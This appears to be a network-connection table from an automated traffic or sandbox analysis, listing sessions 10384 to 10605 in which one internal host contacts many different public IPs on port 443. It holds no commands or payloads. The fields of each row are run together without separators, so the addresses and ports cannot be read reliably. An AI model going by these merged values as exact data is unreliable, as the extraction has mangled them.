                                                10384192.168.2.2360824167.58.64.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10385192.168.2.2352392184.148.164.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10386192.168.2.234129266.143.20.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10387192.168.2.2359538150.34.143.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10388192.168.2.2357036134.239.96.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10389192.168.2.2350192187.247.136.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10390192.168.2.2340626135.169.207.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10391192.168.2.2343810210.187.59.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10392192.168.2.2343776216.75.155.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10393192.168.2.23444722.100.9.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10394192.168.2.2349086121.93.202.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10395192.168.2.235165284.106.21.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10396192.168.2.2339300124.113.110.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10397192.168.2.233560291.235.78.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10398192.168.2.235383286.236.135.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10399192.168.2.2350220195.134.251.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10400192.168.2.234545823.6.167.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10401192.168.2.2350364175.127.107.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10402192.168.2.233406448.5.17.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10403192.168.2.23470662.156.33.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10404192.168.2.2353436183.50.197.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10405192.168.2.2360726107.46.188.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10406192.168.2.233626669.136.173.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10407192.168.2.2344834186.19.147.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10408192.168.2.2350602217.161.15.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10409192.168.2.2334490163.49.235.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10410192.168.2.234236653.31.246.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10411192.168.2.2345238157.1.168.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10412192.168.2.234443036.46.62.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10413192.168.2.2336174129.151.65.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10414192.168.2.2336664202.71.187.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10415192.168.2.2343446161.32.17.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10416192.168.2.2347782188.12.241.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10417192.168.2.2347950217.124.95.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10418192.168.2.2360154104.115.44.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10419192.168.2.2341898110.230.32.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10420192.168.2.2353316173.245.171.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10421192.168.2.2346630156.15.226.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10422192.168.2.235884491.77.55.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10423192.168.2.2356362199.223.170.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10424192.168.2.2357066204.188.23.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10425192.168.2.2335072169.183.255.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10426192.168.2.2349558116.104.228.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10427192.168.2.2334406188.155.144.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10428192.168.2.2344580110.124.120.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10429192.168.2.2354034117.12.34.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10430192.168.2.2336586138.71.194.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10431192.168.2.233813045.106.79.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10432192.168.2.233831462.189.228.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10433192.168.2.233458087.244.3.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10434192.168.2.234692465.181.231.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10435192.168.2.2339726106.31.35.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10436192.168.2.2351608108.181.132.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10437192.168.2.2358626135.154.65.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10438192.168.2.2351398138.54.46.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10439192.168.2.234083631.69.66.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10440192.168.2.2334734217.130.222.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10441192.168.2.23446044.81.26.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10442192.168.2.2350220157.59.194.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10443192.168.2.2359418179.245.168.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10444192.168.2.235868412.144.49.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10445192.168.2.2350414185.115.197.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10446192.168.2.2344064180.14.162.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10447192.168.2.234213037.121.201.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10448192.168.2.2348628198.13.75.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10449192.168.2.2358298190.149.222.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10450192.168.2.2348464195.83.118.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10451192.168.2.233356043.40.253.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10452192.168.2.234557859.90.239.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10453192.168.2.234925695.78.12.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10454192.168.2.235404839.29.116.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10455192.168.2.234125460.206.224.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10456192.168.2.2341076145.180.216.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10457192.168.2.23424841.10.164.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10458192.168.2.235400481.143.27.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10459192.168.2.2356390179.212.152.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10460192.168.2.2355642208.181.111.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10461192.168.2.234295292.212.98.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10462192.168.2.2348686142.159.155.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10463192.168.2.2339888181.132.251.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10464192.168.2.2357826188.9.230.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10465192.168.2.2336462148.3.69.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10466192.168.2.234698897.141.23.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10467192.168.2.2337294173.144.57.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10468192.168.2.2339668104.245.248.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10469192.168.2.2349740109.6.108.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10470192.168.2.2360384201.15.2.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10471192.168.2.2352130129.121.88.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10472192.168.2.2338436144.57.157.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10473192.168.2.2336948124.74.174.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10474192.168.2.2354790182.177.153.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10475192.168.2.233819846.254.164.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10476192.168.2.235277088.140.180.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10477192.168.2.2344772204.153.250.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10478192.168.2.234454849.158.45.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10479192.168.2.2348690141.170.137.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10480192.168.2.2338414205.140.202.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10481192.168.2.2357534143.85.47.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10482192.168.2.2342536163.174.151.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10483192.168.2.2343756223.210.200.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10484192.168.2.2332890102.24.71.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10485192.168.2.2357418182.15.190.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10486192.168.2.2345448167.100.243.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10487192.168.2.234681042.132.138.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10488192.168.2.234965258.49.178.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10489192.168.2.235344860.209.47.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10490192.168.2.2338278156.82.223.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10491192.168.2.2349786109.165.158.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10492192.168.2.2354362143.101.137.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10493192.168.2.2343308107.148.80.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10494192.168.2.2336034153.32.162.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10495192.168.2.2354224171.73.182.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10496192.168.2.233395094.29.230.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10497192.168.2.2347796121.79.249.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10498192.168.2.234695687.235.207.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10499192.168.2.23580282.193.80.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10500192.168.2.2357098195.137.232.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10501192.168.2.235975877.15.69.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10502192.168.2.2338236182.141.216.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10503192.168.2.2348800118.37.91.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10504192.168.2.235390027.48.28.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10505192.168.2.2335850102.235.139.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10506192.168.2.2346918168.81.117.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10507192.168.2.235993025.7.102.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10508192.168.2.234412086.252.129.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10509192.168.2.2342606199.162.211.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10510192.168.2.2360554202.207.82.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10511192.168.2.236027887.221.175.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10512192.168.2.233578432.168.143.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10513192.168.2.233327224.151.135.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10514192.168.2.2355066216.65.85.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10515192.168.2.2348738210.99.36.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10516192.168.2.2334950112.63.17.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10517192.168.2.2337622181.225.67.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10518192.168.2.234068851.211.123.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10519192.168.2.2358482130.83.72.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10520192.168.2.2342828103.208.53.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10521192.168.2.234309217.179.27.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10522192.168.2.233414683.9.122.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10523192.168.2.234903014.100.137.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10524192.168.2.235699694.125.24.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10525192.168.2.2346936123.151.95.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10526192.168.2.23380121.225.57.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10527192.168.2.235922896.230.21.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10528192.168.2.2349866121.160.202.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10529192.168.2.2333718186.25.3.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10530192.168.2.2356864165.201.232.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10531192.168.2.2343188180.162.232.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10532192.168.2.2344926175.228.70.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10533192.168.2.2359002119.88.195.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10534192.168.2.234553038.134.182.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10535192.168.2.235341812.15.255.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10536192.168.2.235596080.50.22.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10537192.168.2.2341120181.228.215.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10538192.168.2.2337554141.191.85.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10539192.168.2.235723286.215.213.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10540192.168.2.2333276221.134.96.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10541192.168.2.2341434204.124.202.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10542192.168.2.2350716181.34.114.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10543192.168.2.235885881.65.164.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10544192.168.2.2341616130.152.76.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10545192.168.2.2341904103.81.156.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10546192.168.2.2349174154.180.209.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10547192.168.2.2350350165.105.133.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10548192.168.2.2351042223.140.71.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10549192.168.2.2337520116.229.67.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10550192.168.2.2360222190.126.207.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10551192.168.2.2360802170.167.173.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10552192.168.2.235182241.205.223.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10553192.168.2.233990673.160.213.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10554192.168.2.234756458.203.211.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10555192.168.2.23442369.198.194.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10556192.168.2.235328088.180.59.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10557192.168.2.2348890202.133.58.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10558192.168.2.234097688.151.122.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10559192.168.2.2356038165.205.139.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10560192.168.2.2348078128.226.120.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10561192.168.2.235167618.204.62.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10562192.168.2.235195484.202.173.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10563192.168.2.234126638.77.180.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10564192.168.2.235889891.142.77.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10565192.168.2.2359196189.119.176.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10566192.168.2.234496212.224.130.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10567192.168.2.2347254177.11.18.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10568192.168.2.235920286.252.135.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10569192.168.2.2350222196.18.33.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10570192.168.2.235592040.74.181.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10571192.168.2.2346044124.21.182.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10572192.168.2.2339682143.85.17.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10573192.168.2.233625236.140.211.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10574192.168.2.235089663.80.108.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10575192.168.2.2342140205.243.135.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10576192.168.2.235732213.19.70.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10577192.168.2.2358318223.43.111.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10578192.168.2.2338984206.142.160.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10579192.168.2.234968663.185.112.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10580192.168.2.234007843.150.27.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10581192.168.2.2353494221.185.231.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10582192.168.2.235771665.176.248.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10583192.168.2.2334016107.42.124.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10584192.168.2.234305813.62.41.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10585192.168.2.2350408108.135.181.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10586192.168.2.2333870142.157.127.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10587192.168.2.2350946197.101.25.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10588192.168.2.2352440223.170.213.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10589192.168.2.2342824111.1.149.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10590192.168.2.2357374208.231.196.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10591192.168.2.233825617.192.197.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10592192.168.2.2333178222.55.57.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10593192.168.2.2350380171.145.93.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10594192.168.2.236022075.132.164.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10595192.168.2.235304242.139.60.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10596192.168.2.234419649.195.148.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10597192.168.2.2351590204.124.149.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10598192.168.2.2333706103.23.33.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10599192.168.2.234817471.120.60.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10600192.168.2.2357562183.219.249.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10601192.168.2.2360712220.250.146.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10602192.168.2.233537080.72.14.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10603192.168.2.2342990164.223.64.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10604192.168.2.2352238141.228.108.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10605192.168.2.234420825.50.126.125443
                                                TimestampBytes transferredDirectionData


